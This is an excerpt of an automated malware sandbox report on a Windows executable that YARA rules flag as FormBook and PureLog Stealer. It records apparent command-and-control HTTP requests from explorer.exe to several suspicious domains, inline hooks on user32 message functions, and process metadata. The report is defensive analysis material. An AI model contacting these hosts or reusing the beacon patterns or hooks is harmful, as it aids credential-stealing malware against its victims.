                                                                                                                  0192.168.2.849711104.21.23.10804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:41:50.896878004 CET156OUTGET /ns03/?9rQhA=J48H&Mli=KqqGrli78UDkBV4XlBvGehqbnDNs0x6MIHFba6A/A1mNeTCnsV+vzi3OAKYlREQ8vsy3 HTTP/1.1
                                                                                                                  Host: www.agathis.fun
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Mar 18, 2024 14:41:50.997144938 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 18 Mar 2024 13:41:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 4515
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: max-age=15
                                                                                                                  Expires: Mon, 18 Mar 2024 13:42:05 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDsIRP8EKti7nrZv%2BY0dk8ooQjL6SpMY87vWpP%2FcqpilLP%2FvaPStzvuIk41EpVUj2h5Q1No71IkF%2BeHrQeHXpE1HbnblQu%2Bwt2EpzGy3PzXKqpqR280Z6D04Np77ABwswf8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8665a4815f961902-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
                                                                                                                  Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
                                                                                                                  Mar 18, 2024 14:41:50.997172117 CET1286INData Raw: 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d
                                                                                                                  Data Ascii: h=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>bo
                                                                                                                  Mar 18, 2024 14:41:50.997219086 CET1286INData Raw: 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d
                                                                                                                  Data Ascii: "></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="b
                                                                                                                  Mar 18, 2024 14:41:50.997288942 CET1286INData Raw: 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38
                                                                                                                  Data Ascii: f-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8665a4815f961902</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:bl
                                                                                                                  Mar 18, 2024 14:41:50.997303963 CET50INData Raw: 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: ranslation = {}; </script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.849713172.67.146.200804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:42:31.107731104 CET166OUTGET /ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw HTTP/1.1
                                                                                                                  Host: www.repair-services.today
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Mar 18, 2024 14:42:31.208311081 CET744INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Mon, 18 Mar 2024 13:42:31 GMT
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=3600
                                                                                                                  Expires: Mon, 18 Mar 2024 14:42:31 GMT
                                                                                                                  Location: https://www.repair-services.today/ns03/?9rQhA=J48H&Mli=mKBnNmWovWzO3p1NH5MdZCS4ccDyJUrzrbuugVn4rxHsd/CaVzVC7EXj5wsmQQFu5Mtw
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDcQIfUoL7r%2BBMilyOBjaDBEam5n2hpP2HNRS0OLGB9uD3w9yBl13KlgT3d%2FDgtJNZbt5Yjy%2BDGWGjqvmbbuw58dqLgPLtRXP7gAjzI4mzGAVS%2FkoLzFECwP9pHr2DITDQqgXNpHWOU5cub7"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8665a57cac7c42de-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.849714172.67.160.57804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:42:51.242336988 CET163OUTGET /ns03/?Mli=K6g4eT3z1o+VClStDjZqHdZbDfQGHeVBUJKwXzUAMY2nFTZ9zwf6CslA69neyKiZ7S0e&9rQhA=J48H HTTP/1.1
                                                                                                                  Host: www.taiyuanbaoyang.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.849715172.67.171.253804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:43:11.686520100 CET167OUTGET /ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n HTTP/1.1
                                                                                                                  Host: www.beatricesswarthout.xyz
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Mar 18, 2024 14:43:11.790338039 CET759INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Mon, 18 Mar 2024 13:43:11 GMT
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=3600
                                                                                                                  Expires: Mon, 18 Mar 2024 14:43:11 GMT
                                                                                                                  Location: https://www.beatricesswarthout.xyz/ns03/?9rQhA=J48H&Mli=VQsc4N5v0Qb/taRRMjFMH1qaQdoag+l2H1v4gotC687CaJU5axHSv4xTKAqiMqdiZl4n
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wtbTBz2H1Qt33%2FiEfZ6430Q%2FuIiHt5yZBAt0%2F9hB9J4WPtF3ipn%2FuTGUzE4oVteM0cIszGdqxq10Q0AqK%2BsV97XixNvskKpQeD692qYAsUnNJN3fxIPBAAhuuO%2F2dCA8X87%2F7ZvnfNYBGMEjwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8665a67a4e4d1902-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.849716216.40.34.41804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:43:52.963320971 CET172OUTGET /ns03/?9rQhA=J48H&Mli=vEpXOfxtbjALuLNDB5L7Pe2+oD++ppewNBRQcYUm39B9ZRdA7FQASoNacaXdwTFFIZyq HTTP/1.1
                                                                                                                  Host: www.velvetgloveseasonings.store
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Mar 18, 2024 14:43:53.081453085 CET1274INHTTP/1.1 200 OK
                                                                                                                  x-frame-options: SAMEORIGIN
                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  x-download-options: noopen
                                                                                                                  x-permitted-cross-domain-policies: none
                                                                                                                  referrer-policy: strict-origin-when-cross-origin
                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                  etag: W/"1eabcc29ddb5b0a2b0ea2dace537ca08"
                                                                                                                  cache-control: max-age=0, private, must-revalidate
                                                                                                                  x-request-id: c38c10d2-03ac-456c-a812-ad1f647f3a32
                                                                                                                  x-runtime: 0.009685
                                                                                                                  transfer-encoding: chunked
                                                                                                                  connection: close
                                                                                                                  Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 76 65 6c 76 65 74 67 6c 6f 76 65 73 65 61 73 6f 6e 69 6e 67 73 2e 73 74 6f 72 65 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69
                                                                                                                  Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>velvetgloveseasonings.store is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=parked"><img width="102" hei
                                                                                                                  Mar 18, 2024 14:43:53.081484079 CET1274INData Raw: 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63 32 66 31 33 37 38 65 33 38 61 35 33 62 64 32 32 62 37 39 30
                                                                                                                  Data Ascii: ght="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>velvetgloveseasonings.store</h1><h2>is a totally awesome idea still being worked on.</h2><p class='big'>Ch
                                                                                                                  Mar 18, 2024 14:43:53.081496000 CET1274INData Raw: 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 68 6f 76 65 72 2e 63 6f 6d 2f 68 6f
                                                                                                                  Data Ascii: ce=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></ul></nav><nav class='social'><u
                                                                                                                  Mar 18, 2024 14:43:53.081510067 CET1274INData Raw: 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e 30 32 38 37 39 2c 35 2e 31 39 36 36 32 20 2d 34 2e 37 36 34 34 33 2c 31 31 2e 32 34 30 34 38 20 2d
                                                                                                                  Data Ascii: 46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.4424
                                                                                                                  Mar 18, 2024 14:43:53.081523895 CET1274INData Raw: 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d 35 38 20 2d 38 38 71 2d 31 31 20 2d 32 39 20 2d 31 38 2e 35 20 2d 37 31 2e 35 74 2d 31 30 20 2d 31
                                                                                                                  Data Ascii: 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t
                                                                                                                  Mar 18, 2024 14:43:53.081536055 CET138INData Raw: 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 20 20 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 34 31 37 31 33 33 38 2d 34 33 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67
                                                                                                                  Data Ascii: analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.849717192.0.78.25804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:44:13.611800909 CET171OUTGET /ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H HTTP/1.1
                                                                                                                  Host: www.gildedbeautyaesthitics.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Mar 18, 2024 14:44:13.699393034 CET508INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 18 Mar 2024 13:44:13 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 162
                                                                                                                  Connection: close
                                                                                                                  Location: https://www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H
                                                                                                                  X-ac: 2.jfk _dfw BYPASS
                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.84971815.197.142.173804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:44:34.116378069 CET163OUTGET /ns03/?9rQhA=J48H&Mli=6xy0BlydHITJ62csFR1w9NwziEOpwYF/YRUtVwNXcka1y+WP4+BwE4Gzjf3LSGjZNmwj HTTP/1.1
                                                                                                                  Host: www.maxhealthunity.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Mar 18, 2024 14:44:34.211697102 CET266INHTTP/1.1 403 Forbidden
                                                                                                                  Server: awselb/2.0
                                                                                                                  Date: Mon, 18 Mar 2024 13:44:34 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 118
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.849719208.91.197.27804084C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Mar 18, 2024 14:45:15.449269056 CET165OUTGET /ns03/?9rQhA=J48H&Mli=pFpcKhsoBDMiQsDxn6RNHE8RotFPog89cmb4qNEXsJuyXSeWzOEqXN59npsx+F1JRdEB HTTP/1.1
                                                                                                                  Host: www.scheuermannworks.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:


                                                                                                                  Code Manipulations

                                                                                                                  User Modules

                                                                                                                  Hook Summary

                                                                                                                  Function NameHook TypeActive in Processes
                                                                                                                  PeekMessageAINLINEexplorer.exe
                                                                                                                  PeekMessageWINLINEexplorer.exe
                                                                                                                  GetMessageWINLINEexplorer.exe
                                                                                                                  GetMessageAINLINEexplorer.exe

                                                                                                                  Processes

                                                                                                                  Process: explorer.exe, Module: user32.dll
                                                                                                                  Function NameHook TypeNew Data
                                                                                                                  PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE8
                                                                                                                  PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE8
                                                                                                                  GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE8
                                                                                                                  GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE8

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:14:41:09
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  Imagebase:0x120000
                                                                                                                  File size:841'224 bytes
                                                                                                                  MD5 hash:E2EDA8C49AB184DE6D3B030BD499E4D1
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1370280563.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1372677605.0000000004F50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:14:41:11
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
                                                                                                                  Imagebase:0xf30000
